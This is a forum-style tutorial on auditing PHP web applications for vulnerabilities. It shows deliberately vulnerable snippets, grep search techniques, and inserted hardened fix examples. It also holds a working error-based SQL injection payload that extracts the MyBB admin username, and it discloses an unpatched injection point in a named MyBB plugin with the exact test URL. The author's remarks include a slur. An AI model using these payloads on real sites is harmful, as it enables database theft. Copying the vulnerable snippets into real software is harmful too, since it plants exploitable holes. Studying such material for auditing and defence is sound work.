PHP Audit - The art of finding 0days in webapps

0x01 - Introduction

[+] Who is this tutorial for?

Before we start I just want to state that I assume you have a basic understanding of PHP, MySQL and some common vulnerabilities and how they work.
You don't have to be a professional programmer, but you need to be able to read and understand PHP code.

If you feel that you need to learn some more before getting into this tutorial, here are some tutorials to start with:

PHP tutorial:

https://php.net/manual/en/tutorial.php


MySQL tutorial:

https://dev.mysql.com/doc/refman/5.0/en/tutorial.html


Vulnerabilities wiki:

https://www.owasp.org/index.php/Category:Attack


[+] Who am I?

Nobody. I don't take any responsibilities for your actions, if you find your ass in jail after exploiting 8000 vulnerable Wordpress blogs don't blame me for teaching you.
But if you have any questions feel free to hit me up with a mail to join7 [+at+] riseup.net

0x02 - Setting up an Audit Environment

[+] Why use an Audit Environment?

You could just download the code you wish to audit, open it in your system's default text editor and start looking for vulnerabilities.
This is not preferable, since there is a very high chance of you missing things and it will surely take a lot more time than using an audit environment.

[+] Web server

We want to set up a web server where we can upload and test PHP applications.
If you don't have any experience with hosting you might want to have a look at XAMPP:

https://www.apachefriends.org/en/xampp.html


If you wish to set it up on your own you should install PHP together with MySQL.
Additional things such as phpMyAdmin and other MySQL managers are of course useful too.

I'm not going to go into how to set up a web server; just google for it if you're having problems.

Note: Since you're going to test possibly vulnerable code on this web server, I suggest you only use it on trusted networks and NEVER on a host that's reachable by the rest of the internet thugs out there.

[+] What are we auditing?

Now that we have our server set up we need to install additional software such as WordPress, Joomla, MyBB or similar, depending on what you're going to audit.
If you're going for a standalone CMS or just a PHP application you will of course not need any of the above, but at some point in your career you'll probably run into a WordPress blog or a MyBB forum.
Here are download links and some information on how to install them:

MyBB
Download: https://www.mybb.com/downloads
Installing Guide: https://docs.mybb.com/Installing.html

WordPress
Download: https://wordpress.org/download/
Installing Guide: https://codex.wordpre...lling_WordPress

Joomla
Download: https://www.joomla.org/download.html
Installing Guide: https://www.joomla.or...ng-started.html

SMF
Download: https://download.simplemachines.org/
Installing Guide: https://wiki.simplema.../smf/Installing

The list can go on...

0x03 - What to look for

[+] User input:

Most vulnerabilities exist because the programmer forgot input validation (or did it improperly).
This is true for SQL Injection, Cross-Site Scripting, File Inclusion, Server Side Include, Code Injection and File Upload vulnerabilities, and a lot more.


[-] $_GET

An associative array of variables passed to the current script via the URL parameters.
https://php.net/manual/en/reserved.variables.get.php

[-] $_POST

An associative array of variables passed to the current script via the HTTP POST method.
https://php.net/manual/en/reserved.variables.post.php

[-] $_REQUEST

An associative array that by default contains the contents of $_GET, $_POST and $_COOKIE.
https://php.net/manual/en/reserved.varia...equest.php

[-] $_COOKIE

An associative array of variables passed to the current script via HTTP Cookies.
https://php.net/manual/en/reserved.varia...ookies.php

[-] $_SERVER

Server and execution environment information ($HTTP_SERVER_VARS is the deprecated old name).
https://php.net/manual/en/reserved.variables.server.php

[-] $_FILES

An associative array of items uploaded to the current script via the HTTP POST method.
https://php.net/manual/en/reserved.variables.files.php


[+] Possible vulnerable functions:

[-] SQL Injection:

Vulnerable Example:

Code:
<?php
// $id is taken straight from the URL and pasted into the SQL string.
$id = $_GET['id'];
$news = mysql_query( "SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3" );
?>

    mysql_*
    $db->* (For MyBB, look here for more info: https://docs.mybb.com...ns-Globals.html & https://docs.mybb.com...se_Methods.html )
    $wpdb->* (For WordPress - Look here for more info: https://codex.wordpre..._Reference/wpdb )

There are a lot of potentially vulnerable mysql_* functions.
Take a look at this reference for more information about the MySQL functions:

https://se1.php.net/manual/en/ref.mysql.php


Some common functions that are potentially vulnerable:

Code:
    mysql_db_query — Selects a database and executes a query on it
    mysql_fetch_array — Fetch a result row as an associative array, a numeric array, or both
    mysql_fetch_field — Get column information from a result and return as an object
    mysql_fetch_row — Get a result row as an enumerated array
    mysql_num_rows — Get number of rows in result
    mysql_result — Get result data
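The fixed version of the `news` lookup, as an added example that is not code from the original post: the vulnerable string concatenation next to a prepared statement. It assumes a mysqli connection `$db`, a `news` table with an integer `id` and a `title` column; the credentials are placeholders.

```php
<?php
// Added example, not code from the original post: the `news` lookup from above
// rewritten with a prepared statement. Assumes a mysqli connection ($db) and a
// `news` table whose `id` column is an integer; connection details are placeholders.

// Vulnerable form: whatever arrives in ?id= becomes part of the SQL text.
function news_by_id_vulnerable(mysqli $db, string $id): array
{
    $res = $db->query("SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3");
    return $res ? $res->fetch_all(MYSQLI_ASSOC) : [];
}

// Hardened form: validate the type first, then bind the value so that it is sent
// to MySQL separately from the statement and can never change its structure.
function news_by_id(mysqli $db, $id): array
{
    // FILTER_VALIDATE_INT returns false for "1'", "1 OR 1=1", "" and anything else
    // that is not a plain integer in range.
    $id = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];                       // or http_response_code(400)
    }
    $stmt = $db->prepare("SELECT * FROM `news` WHERE `id` = ? ORDER BY `id` DESC LIMIT 0,3");
    $stmt->bind_param('i', $id);         // 'i' = bind as integer
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Usage (constructed): the credentials below are placeholders.
$db   = new mysqli('localhost', 'app_user', 'app_password', 'app_db');
$news = news_by_id($db, $_GET['id'] ?? '');
foreach ($news as $row) {
    echo htmlspecialchars($row['title'] ?? ''), "\n"; // escape on output as well
}
```

The same pattern applies to `$wpdb->prepare()` in WordPress and to escaping through `$db->escape_string()` in MyBB; what matters is that the request value never becomes part of the SQL text.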

[-] File Inclusion:

Vulnerable Example:

Code:
<?php
// The request value is used directly in the include path.
$file = $_GET['file'];
if(isset($file))
{
    include("pages/$file");
}
else
{
    include("index.php");
}
?>


    include()
    require()

If the application doesn't restrict what you can include, you can read local files and possibly execute files from a remote server (if allow_url_fopen is enabled; on PHP 5.2 and later allow_url_include must be on as well).
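A hardened version of the include pattern above, as an added example that is not code from the original post: an allow-list of page names, plus a path check for code bases where an allow-list is impractical. The page names and the `pages/` layout are constructed.

```php
<?php
// Added example, not code from the original post: the include("pages/$file") pattern
// from above, hardened. The page names and the pages/ layout are constructed.
$pages = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

// Allow-list lookup: the request value is only ever used as an array key, never as
// part of a path, so "../", "php://", "http://" and "%00" have nothing to act on.
function resolve_page(array $pages, ?string $requested): string
{
    if ($requested === null || $requested === '' || !array_key_exists($requested, $pages)) {
        return $pages['home'];           // default page; a 404 would also be reasonable
    }
    return $pages[$requested];
}

// Second line of defence for code bases where an allow-list is impractical: resolve the
// path and confirm it is still inside the intended directory.
function safe_local_path(string $baseDir, string $relative): ?string
{
    if (strpos($relative, "\0") !== false) {   // NUL bytes are never legitimate in a path
        return null;
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . '/' . $relative);
    // realpath() resolves "../" and returns false for missing files and stream wrappers,
    // so anything that does not start with $base has left the directory.
    if ($base === false || $full === false || strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $full;
}

include resolve_page($pages, $_GET['file'] ?? null);
```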

[-] Upload:

Code:
<?php
// The file name comes from the client and is used as-is; nothing checks type or extension.
$target_path = "uploads/";
$target_path = $target_path . basename($_FILES['uploadedfile']['name']);
if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    echo "The file " . basename($_FILES['uploadedfile']['name']) . " has been uploaded";
} else {
    echo "There was an error uploading the file, please try again!";
}
?>

$_FILES[]

If the application does not restrict what files are uploaded and how, you can upload a script and execute it on the server.
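The upload handler above in a hardened form, as an added example that is not code from the original post. It assumes a form field named `uploadedfile` and an `uploads/` directory that is outside the web root or configured so the web server never executes PHP in it; the size cap and the allowed types are constructed values.

```php
<?php
// Added example, not code from the original post: the upload handler from above,
// hardened. Assumes a form field named "uploadedfile" and an uploads/ directory that
// is either outside the web root or configured so the web server will not execute PHP in it.
function store_upload(array $file, string $uploadDir): ?string
{
    // 1. Reject anything PHP itself reports as a failed or partial upload.
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    // 2. Size cap (constructed value: 2 MB).
    if ($file['size'] > 2 * 1024 * 1024) {
        return null;
    }
    // 3. Decide the type from the file's bytes, not from the client-supplied name or MIME type.
    $finfo   = new finfo(FILEINFO_MIME_TYPE);
    $mime    = $finfo->file($file['tmp_name']);
    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];
    if (!isset($allowed[$mime])) {
        return null;
    }
    // 4. Never reuse the client's file name: generate one and choose the extension ourselves,
    //    so names like "shell.php" or "shell.php.png" cannot reach the disk as executable files.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    // 5. move_uploaded_file() only accepts files that really came in via an HTTP upload.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);                  // plain data, not executable
    return $name;
}

if (isset($_FILES['uploadedfile'])) {
    $stored = store_upload($_FILES['uploadedfile'], __DIR__ . '/uploads');
    echo $stored === null ? 'Upload rejected.' : 'Stored as ' . htmlspecialchars($stored);
}
```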

[-] Code Execution:

Code:
<?php
// User input reaches eval(), which executes its argument as PHP code.
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
?>

    passthru()
    system()
    eval()
    exec()

0x04 - Useful tools, scripts and techniques

[+] Text Editors

Sublime Text 2 is one of my favourite text editors out there.
Its functionality includes, but is not limited to, syntax highlighting, opening directories as 'Projects' (very useful) and a nice search function.
If you don't like it or have another one you like better, feel free to use that instead.

[+] grep


grep is a command-line utility for searching plain-text data sets for lines matching a regular expression. Grep was originally developed for the Unix operating system, but is available today for all Unix-like systems. Its name comes from the ed command g/re/p (global / regular expression / print).

grep is a very useful tool when it comes to auditing webapps.
Let's say we have the following code in app.php:

Code:
<?php
$header = $_GET['header'];
if(isset($header))
{
include("headers/$header");
}
else
{
include("headers/standard.php");
}

$id = $_GET['id'];
$news = mysql_query( "SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3" );
?>


We could use a command like:

Code:
$ grep _GET app.php

Output:

Code:
$header = $_GET['header'];
$id = $_GET['id'];

Finding mysql_* functions:

Code:
$ grep mysql_ app.php

Output:

Code:
$news = mysql_query( "SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3" );

Finding the include() function:

Code:
$ grep include app.php

Output:

Code:
include("headers/$header");
include("headers/standard.php");

Now let's say we have 3 PHP applications in a folder and we wish to search for the include function in all of them. Then we could do something like this:

Code:
$ grep include *.php

Output:

Code:
app2.php: include("headers/$header");
app2.php: include("headers/standard.php");
app3.php: include("headers/$header");
app3.php: include("headers/standard.php");
app.php: include("headers/$header");
app.php: include("headers/standard.php");

If we wish to output the line number we can use the -n argument like this:

Code:
$ grep include *.php -n

Output:

Code:
app2.php:5: include("headers/$header");
app2.php:9: include("headers/standard.php");
app3.php:5: include("headers/$header");
app3.php:9: include("headers/standard.php");
app.php:5: include("headers/$header");
app.php:9: include("headers/standard.php");

Now we wish to check if the words 'SELECT' and 'FROM' can be found:

Code:
$ grep 'SELECT\|FROM' app.php -n

Output:

Code:
13:$news = mysql_query( "SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3" );

If we want to match a string and ignore case we use the -i argument:

Code:
$ grep 'sEleCt\|FroM' app.php -n -i

Output:

Code:
13:$news = mysql_query( "SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3" );
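The same searches done with PHP's own tokenizer instead of grep, as an added example that is not code from the original post. It reports the same file:line pairs for superglobals and dangerous sinks but ignores comments and string literals, and it also flags the `$db->` / `$wpdb->` calls used by MyBB and WordPress code; the sink list is a constructed starting point, and the script name `audit.php` is assumed.

```php
<?php
// Added example, not code from the original post: a tokenizer-based version of the grep
// searches above. It skips comments and string literals and also flags the $db / $wpdb
// objects that MyBB and WordPress code uses for database access.
// The sink list is a constructed starting point; extend it for the code base at hand.
const INPUTS     = ['$_GET', '$_POST', '$_REQUEST', '$_COOKIE', '$_FILES', '$_SERVER'];
const DB_OBJECTS = ['$db', '$wpdb'];
const SINKS      = ['include', 'include_once', 'require', 'require_once', 'eval',
                    'mysql_query', 'mysql_db_query', 'system', 'exec', 'passthru', 'shell_exec'];

// Returns [[line, kind, text], ...] sorted by line number.
function audit_file(string $path): array
{
    $hits = [];
    foreach (token_get_all(file_get_contents($path)) as $tok) {
        if (!is_array($tok)) {
            continue;                    // single-character tokens such as ";" or "("
        }
        [$id, $text, $line] = $tok;
        if ($id === T_VARIABLE && in_array($text, INPUTS, true)) {
            $hits[] = [$line, 'input', $text];
        } elseif ($id === T_VARIABLE && in_array($text, DB_OBJECTS, true)) {
            $hits[] = [$line, 'dbcall', $text];   // like the grep above, this includes "global $db;"
        } elseif (in_array(strtolower($text), SINKS, true)) {
            // include/require/eval are keyword tokens, function names are T_STRING;
            // a comment or quoted string containing the word never matches exactly.
            $hits[] = [$line, 'sink', $text];
        }
    }
    usort($hits, function ($a, $b) { return $a[0] <=> $b[0]; });
    return $hits;
}

// Usage: php audit.php /path/to/plugins   (defaults to the current directory)
foreach (glob(($argv[1] ?? '.') . '/*.php') as $file) {
    foreach (audit_file($file) as [$line, $kind, $text]) {
        printf("%s:%d: [%s] %s\n", $file, $line, $kind, $text);
    }
}
```

This is still only a list of places to read, not a verdict: each hit has to be followed by hand to see whether the input actually reaches the sink.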




[+] Automated tools and why you shouldn't use them

They suck.
Most of them use regex and pattern matching but they miss the logical understanding of an application.
You'll do just fine with a good text editor and grep.


0x05 - Let's Audit - Real world example

We're going to take a look at a real world example, a public exploit, and see if we can find the vulnerabilities:

[+] MyBB DyMy User Agent SQL Injection

https://www.exploit-db.com/exploits/23359/


We'll download the vulnerable application and place it into our plugins folder.
The first thing we do is open it in our text editor.

We'll now start out with some basic searching for possible vulnerable functions and similar stuff:

Code:
grep "\$_GET" dymy_ua.php -i -n
grep "mysql_" dymy_ua.php -i -n
grep "include" dymy_ua.php -i -n

Output:

Nothing useful

Why doesn't it find anything? Are we doing something wrong? The answer is in the source code; let's take a look:

Code:
function dymy_ua_install()
{
    global $db;

    $db->write_query("ALTER TABLE ".TABLE_PREFIX."posts ADD `useragent` VARCHAR(255)");
}




So when we audit MyBB Plugins we need to change our audit methods a bit.
We're going to search for $db->*, since that is used in MyBB Plugins for Database interactions.
Let's go back to the terminal and test some new stuff.

Code:
joinse7en@box /v/w/m/i/plugins> grep "\$db" dymy_ua.php -i -n

56: global $db;
58: $db->write_query("ALTER TABLE ".TABLE_PREFIX."posts ADD `useragent` VARCHAR(255)");
63: global $db;
65: if($db->field_exists("useragent", "posts"))
75: global $db;
77: $db->delete_query("templategroups", "title='DyMy User Agent Templates'");
78: $db->write_query("ALTER TABLE ".TABLE_PREFIX."posts DROP `useragent`");
83: global $db;
85: $q = $db->simple_select("templategroups", "COUNT(*) as count", "title = 'DyMy User Agent'");
86: $c = $db->fetch_field($q, "count");
87: $db->free_result($q);
95: $db->insert_query("templategroups", $ins);
101: "template" => $db->escape_string(' <img src="images/useragent/os/{$os}.png" alt="{$os}" title="{$os_name}">'),
106: $db->insert_query("templates", $ins);
111: "template" => $db->escape_string(' <img src="images/useragent/browser/{$browser}.png" alt="{$browser}" title="{$browser_name}">'),
116: $db->insert_query("templates", $ins);
125: global $db;
127: $db->delete_query("templates", "title IN('DyMyUserAgent_Postbit_OS', 'DyMyUserAgent_Postbit_Browser') AND sid='-2'");


Since there isn't much here we can tamper with, we'll go to line 127 and see what's up:

Code:
function dymy_ua_deactivate()
{
global $db;

$db->delete_query("templates", "title IN('DyMyUserAgent_Postbit_OS', 'DyMyUserAgent_Postbit_Browser') AND sid='-2'"); // Line 27

require_once MYBB_ROOT."/inc/adminfunctions_templates.php";
find_replace_templatesets('postbit',"#".preg_quote('{$post[\'icon_browser\']}{$post[\'icon_os\']}')."#",'',0);
find_replace_templatesets('postbit_classic',"#".preg_quote('{$post[\'icon_browser\']}{$post[\'icon_os\']}</td>')."#",'</td>',0);
}

function dymy_ua_dh_post_insert(&$data)
{
$useragent = $_SERVER ? $_SERVER['HTTP_USER_AGENT'] : $HTTP_SERVER_VARS['HTTP_USER_AGENT'];
$data->post_insert_data['useragent'] = $useragent;
$data->post_update_data['useragent'] = $useragent;
}

function dymy_ua_postbit(&$post)
{
global $templates;

if(isset($post['browser']) && isset($post['system']) && !empty($post['browser']) && !empty($post['system']) && empty($post['useragent']))
{
$os = str_ireplace("icon_", "", $post['system']);
$browser = str_ireplace("icon_", "", $post['browser']);
$browser = preg_replace("#^linux([a-z])#si", "$1", $browser);
}
...

Here we notice something very nice; take a look at this:

Code:
function dymy_ua_dh_post_insert(&$data)
{
$useragent = $_SERVER ? $_SERVER['HTTP_USER_AGENT'] : $HTTP_SERVER_VARS['HTTP_USER_AGENT'];
$data->post_insert_data['useragent'] = $useragent;
$data->post_update_data['useragent'] = $useragent;
}


We see here that the application inserts the User-Agent header into the database without any kind of sanitization.
Let's fire up our MyBB forum on our localhost and try this shit out.

Activate the Plugin in your Admin Panel and then go to a thread and post something with Live HTTP Headers running.
We'll see this next to our post:


So now we'll try some basic tests to see if the SQL Injection vulnerability actually exists:


Ah, wonderful!
Now we'll play around with it until we get a nice query to inject.
I'm not going to teach you SQL Injection, that's your job.
After some testing we come up with this query:

Code:
' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)B)); #
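For completeness, the fix for the hook analysed above, as an added example that is not code from the plugin or the original post. It treats the header as untrusted input and assumes, as the plugin's own template inserts through `$db->escape_string()` do, that MyBB's `$db` methods expect values that are already escaped.

```php
<?php
// Added example, not code from the plugin or the original post: the post_insert hook
// above with the header treated as untrusted input. Assumes, as the plugin's own template
// inserts via $db->escape_string() do, that MyBB's $db methods expect pre-escaped values.
function dymy_ua_dh_post_insert_hardened(&$data)
{
    global $db;
    // The header may be missing entirely; $HTTP_SERVER_VARS no longer exists since PHP 5.4.
    $useragent = isset($_SERVER['HTTP_USER_AGENT']) ? (string) $_SERVER['HTTP_USER_AGENT'] : '';
    // The column was created as VARCHAR(255) in dymy_ua_install(), so cut to that length
    // before escaping (the escaped form may legitimately be longer on the wire).
    $useragent = substr($useragent, 0, 255);
    // Escape for the SQL statement so the value cannot terminate the quoted literal.
    $useragent = $db->escape_string($useragent);
    $data->post_insert_data['useragent'] = $useragent;
    $data->post_update_data['useragent'] = $useragent;
}
```

Escaping only covers the insert; anything that later renders the stored string in a page must HTML-encode it as well.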




0x06 - Publish of a new 0day: MyFlags MyBB plugins SQL Injection (Merry Christmas faggots :3)

Before I leave you to your Auditing I'm going to publish a new 0day.
The SQL Injection vulnerability exists in the MyBB Plugin HM_My Country Flags:

https://mods.mybb.com/view/hm-my-country-flags


When this plugin is activated a user can go to his User Control Panel and pick a country.

Whenever the user now posts, the Nationalidad will show up next to his posts.

Start Live HTTP Headers and click the country. In Live HTTP Headers, copy the URL ('localhost/mybb/misc.php?action=hmflags&cnam=Belgium&pf=5') and paste it into a new tab.

Now put a ' after the country:

https://localhost/mybb/misc.php?action=hmflags&cnam=Belgium'&pf=5

Output:

MyBB has experienced an internal SQL error and cannot continue.

Code:
SQL Error:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Belgium''' at line 1
Query:
SELECT * FROM mybb_users u LEFT JOIN mybb_usergroups g ON (u.usergroup=g.gid) LEFT JOIN mybb_userfields f ON (u.uid=f.ufid) WHERE fid5='Belgium'